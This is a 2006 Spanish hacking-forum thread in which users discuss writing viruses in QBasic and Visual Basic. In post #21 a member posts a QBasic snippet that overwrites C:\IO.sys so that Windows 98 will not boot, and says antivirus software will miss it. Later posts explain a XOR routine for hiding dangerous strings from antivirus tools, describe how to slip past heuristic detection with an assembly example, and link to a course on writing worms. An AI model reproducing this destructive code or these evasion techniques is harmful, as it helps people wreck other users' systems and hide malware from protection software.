Página 2 de 4 PrimerPrimer 1234 ÚltimoÚltimo
Resultados 21 al 40 de 62

Visual Basic Script

  1. #21  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    sip, pero mira esto...

    no creo esto que voy a hacer se catalgoe como virus pero seguro que te jode la maquina

    Podes hacer un programa que modifique informacion de archivos importantes, y que en consecuencia no ejecute correctamente windows.

    ej, para win98.
    Código:
    cls
    open "c:\IO.sys" for output as#1
            rem no me acuerdo bien, pero casi seguro que no te dejara iniciar windows
            write#1, "Hecho por 3nD_SuB"
    close#1
    rem lo compilas y listo
    rem perdon me olvde, es para qbasic, buscate el compilador y listo, es gratis
    ^^ no creo que un antivirus detecte este archivo. Cuando lo ejecutes no te das cuenta de nada, pero cuando la reinices, chf, no inicia windows.
    Todo depende de lo que quieras hacer.

    SAludos
    Cypress
    Última edición por Cypress; 18-10-2006 a las 19:59
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  2. #22  
    Medio
    Fecha de ingreso
    Oct 2006
    Mensajes
    61
    Descargas
    0
    Uploads
    0
    Cypress como te lo curras tio ^^
    en que lenguaje está ese código?
    bueno cuanto más sepas programar mas facil te sera realizar exactamente lo que quieres... por lo tanto... a estudiar!!!

    seguramente los antivirus cadavez sean mejores, pero nunca lo serán del todo!!

    ^^
    Pr1v4t3_SuB c0MM4nD1_Cl1ck ()
    Text1.text = "FUCK YOU"
    c0MM4nD1.c4p710n = "Click aquí"
    3nD_SuB
    Citar  
     

  3. #23  
    Iniciado
    Fecha de ingreso
    Oct 2006
    Mensajes
    26
    Descargas
    0
    Uploads
    0
    xD xD xD xD Este kodigo esta en Visual Batch, o Visual Bachic o algo por el estilo...xD XD XD XD xD as mezclado VB y Batch....

    Cls es de batch...luego habres el archivo kon kodigo de VB, luego pones komentario en kodigo batch y escribes en el archivo y lo cierras en VB....mezcla de Lengaujes!!!!

    Haber, si kieren eskonder strings (kadenas) peligrosas a los AV's se rekiere de una funcion de encriptación...ke se enkargue de encritpar el kontenido y a su vez desenkriptarlo en ejecución....

    les dejo este link ke les servira:

    http://foro.el-hacker.com/index.php/topic,45606.0.html

    Salu2
    Citar  
     

  4. #24  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    hey habla con propiedad o no digas nada, es para qbasic. y es mas si sacas el cls funciona para visual, YA QUE EL COMANDO REM TAMBIEN FUNCIONA
    Última edición por Cypress; 18-10-2006 a las 20:30
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  5. #25  
    Iniciado
    Fecha de ingreso
    Oct 2006
    Mensajes
    26
    Descargas
    0
    Uploads
    0
    xD xD xD xD ok ok....no te enfades...xD xD yo no konocia QBasic, y ya ke batch tiene el Rem y el cls peus e dicho eso...

    Salu2
    Citar  
     

  6. #26  
    Medio
    Fecha de ingreso
    Oct 2006
    Mensajes
    61
    Descargas
    0
    Uploads
    0
    Ostia Hendrix!!
    gracias por la info!!!
    pero...
    Más o menos esta funcion en visual basic seria esto?

    Public Function q(j) --------------------------> que es una funcion para todo el codigo
    On Error Resume Next------------------------>en caso de error en el codigo acer lo siguiente:
    For R = 1 To Len(j)--------------------------->no lo entiendo
    q = q & Chr(Asc(Mid(j, R, 1)) Xor 7)----------->no lo entiendo
    Next----------------------------------------->no lo entiendo
    End Function--------------------------------->fin de la función

    algien me puede explicar lo que hacen esas lineas de código?? se k para vosotros sera algo estúpido pero no lo entiendo =(

    gracias^^
    Pr1v4t3_SuB c0MM4nD1_Cl1ck ()
    Text1.text = "FUCK YOU"
    c0MM4nD1.c4p710n = "Click aquí"
    3nD_SuB
    Citar  
     

  7. #27  
    Iniciado
    Fecha de ingreso
    Oct 2006
    Mensajes
    26
    Descargas
    0
    Uploads
    0
    For R = 1 To Len(j)-----------> Para R = 1 hasta ke valga la longitud de la cande a a enkritpar (ke esta dentro de la string J) haz lo siguiente
    q = q & Chr(Asc(Mid(j, R, 1)) Xor 7)-----------> *
    Next ---> Incrementa el valor de R y vuelve al principio del for.

    * Esto lo explikare por pasos:

    Asc(Mid(j, R, 1) Esto lo ke ahce es kojer el karacter nº R (es decir, en este ejemplo kojeria karacter por caracter de toda la string, puesto ke el 1 ke esta despues de la R indica kuantos caracteres se van a kojer, para mas info (http://www.monografias.com/trabajos2/guiavb/guiavb.shtml, busken por Mid). Luego Esto lo ke hace es pasar a ascii el resutlado del la buskeda del Mid (es decir, kedara el numero ke okupa el karackter resultante en la tabla ASCII)

    Xor 7) Esto le pasa el Operador Xor para enkritparlo. (definición de Xor: Operador a nivel de bits: suma lógica exclusiva, que da como resultado 1 si los dos bits son distintos y 0 si los dos bits son iguales.)

    Chr( Finalmente lo ke hace Chr es pasar a karacter el nº del resutlado de la enkritapción.

    q = q & Esto lo ke hace es poner dentro de q TODOS los resultados obtenidos....si solamente se pusiera q= pues el resutlado seria el ultimo caracter enkritpado. el q=q & lo ke hace es decir: poner dentro de q lo ke habia antes y el resutlado actual obtenido.

    Espero ke haya kedado klaro...

    PD: Cabe decir ke este metodo de enkritpación es una chorrada....si kieren les paso algoritmos mios, ke haya en internet y algoritmos mios ke son (para mi nivel de criptoanalista) casi irrompibles.

    Salu2
    Citar  
     

  8. #28  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Mensajes
    200
    Descargas
    1
    Uploads
    0
    Bueno, yo de este tema domino más que de hacking así que os puedo dar una mano

    Primero, la idea que tienes de porque un virus que formatee el disco duro va a ser más dificil de pillar. Un virus ha de buscar durar lo máximo posible sin ser detectado. Para mi un buen virus es el que consigue esto. Hacer un virus que no sea detectable ni por heurística, y que formatee el disco duro lo puede hacer cualquiera, y personalmente quien me venga fardando por hacer un virus que formatea me parece un lammer de los gordos. Si alguna vez te has leido una ezine de algun grupo creador de virus verás que tratan temas de como hacer dificil su estudio mediante tecnicas complejas de ocultación, encriptación, etc. y de hecho, había un grupo español (29A) cuyo lema era hacer virus pero sin payload destructivo.

    Luego, en cuanto a los antivirus. Básicamente trabajan con 2 cosas: firmas (para virus conocidos) y heurística (combinada con ejecución virtual). La primera es obvia así que creo que no hace falta explicarla. La segunda se basa en buscar acciones "sospechosas" que un programa "normal" no hace. El ejemplo típico es acceder a las funciones del kernel.dll mediante una serie de funciones que usan típicamente los virus, o cosas por el estilo. El antivirus usa un peso a cada "característica" de manera que si salta una sola no pasa nada, pero si saltan varias...peligro. Antiguamente la heurística era algo tan sencillo como buscar una mini cadena, por ejemplo esto:

    MOV AX, 20H

    Que pasa si en lugar de eso haces:

    MOV AX, 40H
    MOV BX, 20H
    DEC AX, BX o XCHG AX, BX

    Que finalmente AX=20H pero te has saltado la heurística. Ahora para evitar esto lo que hacen es "ejecutar" el código de manera que así si que podrían ver si AX termina valiendo 20H.

    En cuanto a si hacer un virus "indetectable" es cada vez más dificil? Es como preguntar si cada vez es más dificil colarte en un ordenador. No es que sea dificil, pero se han de investigar nuevas maneras. Hay algunas muy curiosas y muy antiguas. Para mi, el mecasnismo que más me ha gustado era el del virus DIR, que se escondía en los huecos libres de la FAT, de manera que no ocupaba espacio!!!! El virus no llegó muy lejos, pero la verdad es que la idea era muy buena. Luego con los ejecutables de Windows apareció una "versión" de este sistema y que se basaba en ocultar el virus en secciones del fichero que tenian hueco (sitios que habian para rellenar...).

    P.D.: Con el tiempo que hace que no toco ASM fijo que la he cagado con el código de ejemplo, pero la idea por lo menos se tiene que pillar
    Citar  
     

  9. #29  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    hay algo que nunca hablamos y que para mi es una de las cosas mas importates de un virus, la capacidad de reproducirse asi mismo, es decir distribuirse a otras computadoras a travez de Floppys, Cds, Internet, etc.

    Eso nunca lo puede hacer ni con visual ni con qbasic.
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  10. #30  
    Medio
    Fecha de ingreso
    Oct 2006
    Mensajes
    61
    Descargas
    0
    Uploads
    0
    porqué no Cypress?
    Pr1v4t3_SuB c0MM4nD1_Cl1ck ()
    Text1.text = "FUCK YOU"
    c0MM4nD1.c4p710n = "Click aquí"
    3nD_SuB
    Citar  
     

  11. #31  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Mensajes
    200
    Descargas
    1
    Uploads
    0
    Cita Iniciado por 3nD_SuB
    porqué no Cypress?
    Son lenguajes interpretados. No hay intérprete instalado, no hay ejecucción posible. Así de sencillo.
    Citar  
     

  12. #32  
    Medio
    Fecha de ingreso
    Oct 2006
    Mensajes
    61
    Descargas
    0
    Uploads
    0
    joder!! =( ke mierdaa
    pero troyanos en visual basic si que se puede no?
    =D
    Pr1v4t3_SuB c0MM4nD1_Cl1ck ()
    Text1.text = "FUCK YOU"
    c0MM4nD1.c4p710n = "Click aquí"
    3nD_SuB
    Citar  
     

  13. #33  
    Iniciado
    Fecha de ingreso
    Oct 2006
    Mensajes
    26
    Descargas
    0
    Uploads
    0
    Cita Iniciado por Malenko
    Son lenguajes interpretados. No hay intérprete instalado, no hay ejecucción posible. Así de sencillo.
    Visual Basico no es interpretado....

    En VB es facilisimo hacer reproducciones....mirate mi kurso de Worms:

    Descarga

    Es para iniciarse en la proramacion de Worms en VB.

    Yo estaba haciendo un geenrador de worms en VB para krear gusando en VBS polimorficos...pero los VBS estan practicamente obsoletos...

    Salu2
    Citar  
     

  14. #34  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Mensajes
    200
    Descargas
    1
    Uploads
    0
    Cita Iniciado por Hendrix.
    Visual Basico no es interpretado....
    El título del hilo que pone? Visual Basic o Visual Basic SCRIPT??? Ya se yo que visual basic es compilado, pero basic (qbasic) o un VB Script son interpretados. Eso no quiere decir que no se puedan hacer gusanos, pero si no hay interprete...pues lo dicho. Si he puesto esa frase es por algo, sino mirate a que se refería 3nD_SuB
    Citar  
     

  15. #35  
    Iniciado
    Fecha de ingreso
    Oct 2006
    Mensajes
    26
    Descargas
    0
    Uploads
    0
    Ok...es cierto....

    Por cierto, en los XP viene el interprete de los vbs por defecto o se tiene ke instalar el VB??

    Salu2
    Citar  
     

  16. #36  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Mensajes
    200
    Descargas
    1
    Uploads
    0
    bueno, XP en todo caso vendría con el WSH pero creo recordar que no viene por defecto, por temas de seguridad, pero no estoy seguro 100%
    Citar  
     

  17. #37  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    hey, yo tengo un compilador de qbasic
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  18. #38  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Mensajes
    200
    Descargas
    1
    Uploads
    0
    Cita Iniciado por Cypress
    hey, yo tengo un compilador de qbasic
    Pero eso puede ser como decir "tengo compilador de pascal" puedes hacer un virus en pascal (que los hay) y lo puedes compilar, pero luego no te irá en ningún PC moderno (los ejecutables "petaban" en mas de un Pentium a 200).
    Citar  
     

  19. #39  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    en pascal tengo una vercion moderna llamada free pascal.
    y corre perfectamente en windows.
    (y mi compilador de qbasic tambien corre para windows)
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  20. #40  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Mensajes
    200
    Descargas
    1
    Uploads
    0
    Yo hacía referencia al TurboPascal 7, que para mi es el de toda la vida, el "clásico" :P
    Citar  
     

Temas similares

  1. ayuda de visual basic script
    Por dragonxp29 en el foro GENERAL
    Respuestas: 2
    Último mensaje: 13-06-2009, 21:01
  2. exe en visual basic
    Por antonia28 en el foro GENERAL
    Respuestas: 5
    Último mensaje: 08-07-2008, 11:42
  3. Visual Basic
    Por Athos en el foro PROGRAMACION DESKTOP
    Respuestas: 5
    Último mensaje: 14-09-2005, 11:06
  4. visual basic
    Por joputa en el foro PROGRAMACION DESKTOP
    Respuestas: 20
    Último mensaje: 17-06-2005, 08:56
  5. Visual Basic
    Por DLANOR en el foro APLICACIONES
    Respuestas: 7
    Último mensaje: 27-01-2005, 04:15

Marcadores

Marcadores